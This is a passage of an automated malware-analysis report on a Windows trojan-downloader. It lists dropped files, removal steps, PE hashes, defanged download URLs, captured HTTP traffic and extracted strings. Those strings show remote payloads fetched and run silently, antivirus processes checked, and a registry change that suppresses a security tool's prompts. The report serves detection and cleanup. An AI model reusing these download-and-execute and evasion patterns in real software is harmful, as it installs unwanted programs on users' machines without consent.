%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\347.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\dataReport.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerProxy.dll (10128 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\icon_resou.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\head-star-png8.png (450 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDClientProxy.dll (45104 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\overcast.png (680 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ala.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.ttf (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sunny.png (856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-foward.png (156 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-snow.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings_z.png (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-center.png (122 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\res_gupiao.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_g.png (248 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Heartbeat.dll (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\ssl-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-login-success.png (824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-back.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\kuaidi.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sand.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\settings\user_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (512 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130895171752697500.dat (314 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\stock.pb (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerExe.exe (63735 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db (284596 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db.bak (10 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (5454 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\novel.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\settings\default_setting.db (24 bytes)
%Documents and Settings%\%current user%\Desktop\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\å¸载百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\百度.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"BaiduClient" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe -noclient" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Soft
Product Name: ?????
Product Version: 5.2.1.0
Legal Copyright: Soft ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.2.1.0
File Description: dc CAD
Comments: ????
Language: English (United States)
Company Name: Soft Product Name: ?????Product Version: 5.2.1.0Legal Copyright: Soft ????Legal Trademarks: Original Filename: Internal Name: File Version: 5.2.1.0File Description: dc CADComments: ????Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 2248704 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 2252800 | 536576 | 534528 | 5.47189 | 1878ef6ce51cdfb4fdd621cc3b91633b |
| .rsrc | 2789376 | 24576 | 24576 | 3.09822 | 001b173ba8ca5bdeefda647e026db3f3 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://cnrdn.com/rd.htm?id=1384659&r=http://www.baidu.com/ | 42.156.140.191 |
| hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1 | |
| hxxp://brdlsw.jomodns.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe | |
| hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423 | |
| hxxp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe | 118.123.210.46 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dlsw.br.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: JSP3/2.0.13
Date: Sat, 17 Oct 2015 00:57:53 GMT
Content-Type: application/octet-stream
Content-Length: 6831104
Connection: keep-alive
ETag: "554c7256-683c00"
Last-Modified: Fri, 08 May 2015 08:22:46 GMT
Expires: Tue, 24 Nov 2015 10:30:54 GMT
Age: 5322419
Cache-Control: max-age=8640000
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................p.......B...9............@..........................P........i...@.................................d...........Hq............h..#...........................................................................................text....o.......p.................. ..`.rdata...*.......,...t..............@..@.data....~..........................@....ndata.......0...........................rsrc...Hq.......r..................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>
GET /rd.htm?id=1384659&r=http://VVV.baidu.com/ HTTP/1.1
Referer: hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: cnrdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Sat, 17 Oct 2015 00:57:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
186f..<!DOCTYPE html>.<html>.<head>..<title>CNZZ...............................................................</title>..<meta charset="utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />..<meta content="yes" name="apple-mobile-web-app-capable"/>..<meta content="yes" name="apple-touch-fullscreen" />..<meta name="keywords" content="cnzz,............,............,............,............,.........,......,............,............,......,............,seo,............,.........,.........,............" />..<meta name="description" content="CNZZ.........................................................................................................................................................................................." />..<meta name="author" content="cnzz" />..<meta name="copyright" content="www.cnzz.com" />..<link href="hXXp://VVV.cnzz.com/favicon.ico" rel="shortcut icon" />..<link href="hXXp://img.cnzz.net/adt/cnzz_rd/transfer.css" rel="stylesheet"/>.</head>.<body><script>.with(document)with(body)with(insertBefore(createElement("script"),firstChild))setAttribute("exparams","category=&userid=&aplus&yunid=&&trid=0a930d6b14450434725695389e&asid=AQAAAAAQnSFWbs2PJwAAAACoR 2/bGzDiA==",id="tb-beacon-aplus",src=(location>"https"?"//g":"//g") ".alicdn.com/alilog/mlog/aplus_v2.js").</script>...<div class="transfer">...<div class="transfer-inn">....<img src="ht
<<< skipped >>>
GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 17 Oct 2015 00:31:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="uc1"
Accept-Ranges: bytes
x-cdmi-object-size: 10222796
x-cdmi-create-time: 2015-08-20 15:47:19
Content-Length: 10222796
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
........W...list_soft.xml.......................................................................................................................................................................................................................................................t...bluebox.png.........................................................................................................................................................................................................................................................g...ucweb.png............................................................................................................................................................................................................................................................WO.BlueBoxSetup.exe....................................................................................................................................................................................................................................................PuX.Browser_V3.2.2937.0_f_4070_(Build14120411).exe.........................................................................................................................................................................................................................<?xml version="1.0" encoding="UTF-8" ?>..<Profile>.. <SoftwareList SuitLabel="............;............;">.. <Group GroupId="0" name="............">.. <Softw
<<< skipped >>>
GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 17 Oct 2015 00:31:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="7gj1"
Accept-Ranges: bytes
x-cdmi-object-size: 9894214
x-cdmi-create-time: 2015-09-21 09:04:14
Content-Length: 9894214
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.6 &.Xs&.Xs&.Xs.r*s*.Xs.p&s/.Xs.r%s..Xs.r5sa.Xs...s .Xs/..s$.Xs&.Ys..Xs...s..Xs.r6s..Xs.r"s'.Xs.r$s'.Xs&.Xs'.Xs.r s'.XsRich&.Xs........................PE..L......U................. ..........p........0....@.......................... ..........................................Au......h........1..............`............8..................................@............0...............................text............ .................. ..`.rdata.......0.......0..............@..@.data........@...@...@..............@....rsrc....1.......@..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_856:
`.rsrc
`.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
.tTPV
.tTPV
FTPjK
FTPjK
FtPj;
FtPj;
F.PjRWj
F.PjRWj
u.WWj
u.WWj
u.VVj
u.VVj
u$SShe
u$SShe
user32.dll
user32.dll
urlmon
urlmon
ole32.dll
ole32.dll
shell32.dll
shell32.dll
RegOpenKeyA
RegOpenKeyA
RegEnumKeyA
RegEnumKeyA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
URLDownloadToFileA
URLDownloadToFileA
D:\dream
D:\dream
D:\dream\win1.log
D:\dream\win1.log
QQPCTray.exe
QQPCTray.exe
D:\dream\winky.log
D:\dream\winky.log
360tray.exe
360tray.exe
D:\dream\win2.log
D:\dream\win2.log
D:\dream\winzmbd.log
D:\dream\winzmbd.log
C:\Users\Public\Desktop\UC
C:\Users\Public\Desktop\UC
%Documents and Settings%\All Users\
%Documents and Settings%\All Users\
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Windows
Windows
C:\Users\Public\Desktop\2345
C:\Users\Public\Desktop\2345
C:\Users\Public\Desktop\
C:\Users\Public\Desktop\
D:\dream\b2.bat
D:\dream\b2.bat
D:\dream\2k
D:\dream\2k
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe -s1
D:\dream\2345pic_k1252705.exe -s1
2345pic_k1252705.exe
2345pic_k1252705.exe
C:\Users\
C:\Users\
%Documents and Settings%\
%Documents and Settings%\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
D:\dream\1.bat
D:\dream\1.bat
hXXp://cnrdn.com/rd.htm?id=1434474&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1434474&r=http://VVV.baidu.com/
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
D:\dream\ky
D:\dream\ky
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa
D:\dream\Kuaizip_Setup_7654_1061607.exe
D:\dream\Kuaizip_Setup_7654_1061607.exe
D:\dream\Kuaizip_Setup_7654_1061607.exe /JingMo
D:\dream\Kuaizip_Setup_7654_1061607.exe /JingMo
hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/
D:\dream\b.bat
D:\dream\b.bat
D:\dream\2b1
D:\dream\2b1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b1?public&code=afee9a3d69bbe1feef1f6dc8cfde1cbf
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b1?public&code=afee9a3d69bbe1feef1f6dc8cfde1cbf
D:\dream\2b2
D:\dream\2b2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b2?public&code=02bb6661abd99ff72259707a9b53c750
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b2?public&code=02bb6661abd99ff72259707a9b53c750
D:\dream\2b3
D:\dream\2b3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b3?public&code=8ce18dbc7b1a421fa4d0ffe8392ee432
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b3?public&code=8ce18dbc7b1a421fa4d0ffe8392ee432
D:\dream\2b4
D:\dream\2b4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b4?public&code=b3a42642be7f0a15054e0695b2b9447f
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b4?public&code=b3a42642be7f0a15054e0695b2b9447f
D:\dream\2b5
D:\dream\2b5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b5?public&code=c9e36403780d6acd5f66e1bc35d1838d
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b5?public&code=c9e36403780d6acd5f66e1bc35d1838d
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe -s1
D:\dream\2345explorer_k1252705.exe -s1
2345explorer_k1252705.exe
2345explorer_k1252705.exe
hXXp://cnrdn.com/rd.htm?id=1438531&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1438531&r=http://VVV.baidu.com/
D:\dream\zy
D:\dream\zy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078
D:\dream\lgezy
D:\dream\lgezy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/3/lge?public&code=84c5751f6a57ab5839dc76a83b46d24d
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/3/lge?public&code=84c5751f6a57ab5839dc76a83b46d24d
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueResource.bpk
D:\dream\BlueResource.bpk
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w72=Microsoft\Windows\Start Menu"
set "w72=Microsoft\Windows\Start Menu"
"%USERPROFILE%\%xp1%"
"%USERPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%USERPROFILE%\%xp2%"
"%USERPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
D:\dream\2.bat
D:\dream\2.bat
hXXp://cnrdn.com/rd.htm?id=1491046&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1491046&r=http://VVV.baidu.com/
D:\dream\7b1
D:\dream\7b1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b1?public&code=65e1f8bb6a35d835ac36afb3fe114df0
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b1?public&code=65e1f8bb6a35d835ac36afb3fe114df0
D:\dream\7b2
D:\dream\7b2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b2?public&code=75e1b53f8002b8fcbef1533ddcf838f3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b2?public&code=75e1b53f8002b8fcbef1533ddcf838f3
D:\dream\7b3
D:\dream\7b3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b3?public&code=2bb598cb60451c4b4c1930932c14c586
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b3?public&code=2bb598cb60451c4b4c1930932c14c586
D:\dream\7b4
D:\dream\7b4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b4?public&code=4cdbf863df18a09984db8531c4f8dac0
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b4?public&code=4cdbf863df18a09984db8531c4f8dac0
D:\dream\7b5
D:\dream\7b5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b5?public&code=192609a39126a61929211de82ef70fd6
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b5?public&code=192609a39126a61929211de82ef70fd6
D:\dream\bdBrowserSetup-5956-ftn_1050103060.exe
D:\dream\bdBrowserSetup-5956-ftn_1050103060.exe
hXXp://cnrdn.com/rd.htm?id=1483547&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1483547&r=http://VVV.baidu.com/
D:\dream\uc1
D:\dream\uc1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423
D:\dream\uc2
D:\dream\uc2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc2?public&code=fc17f9c282f24d1cb0252ce893cddb8f
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc2?public&code=fc17f9c282f24d1cb0252ce893cddb8f
D:\dream\uc3
D:\dream\uc3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc3?public&code=950c1793575761983e9f4158bbce1bc5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc3?public&code=950c1793575761983e9f4158bbce1bc5
D:\dream\uc4
D:\dream\uc4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc4?public&code=4521c8d77cc1a0a675996ecf979e172c
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc4?public&code=4521c8d77cc1a0a675996ecf979e172c
D:\dream\uc5
D:\dream\uc5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc5?public&code=7ec7b3ccb21e6f94450c8a28eeed7c0e
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc5?public&code=7ec7b3ccb21e6f94450c8a28eeed7c0e
D:\dream\uc6
D:\dream\uc6
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc6?public&code=d05b6e4a191a5f39789a63a568014257
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc6?public&code=d05b6e4a191a5f39789a63a568014257
D:\dream\lgeuc
D:\dream\lgeuc
D:\dream\3.bat
D:\dream\3.bat
hXXp://cnrdn.com/rd.htm?id=1438530&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1438530&r=http://VVV.baidu.com/
D:\dream\7GJ1
D:\dream\7GJ1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1
D:\dream\7GJ2
D:\dream\7GJ2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj2?public&code=559f2fd5eae8a65b9c76b7e06baadf9f
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj2?public&code=559f2fd5eae8a65b9c76b7e06baadf9f
D:\dream\7GJ3
D:\dream\7GJ3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj3?public&code=90f7aa8c1fe3f4c7fb2afcb21556be79
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj3?public&code=90f7aa8c1fe3f4c7fb2afcb21556be79
D:\dream\7GJ4
D:\dream\7GJ4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj4?public&code=c707ac8ce76d6128340264348878791d
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj4?public&code=c707ac8ce76d6128340264348878791d
D:\dream\7GJ5
D:\dream\7GJ5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj5?public&code=8be55fde74c8db8826421a15c32e49a3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj5?public&code=8be55fde74c8db8826421a15c32e49a3
D:\dream\PCMgr_Setup_10_8_16208_227(123004164).exe
D:\dream\PCMgr_Setup_10_8_16208_227(123004164).exe
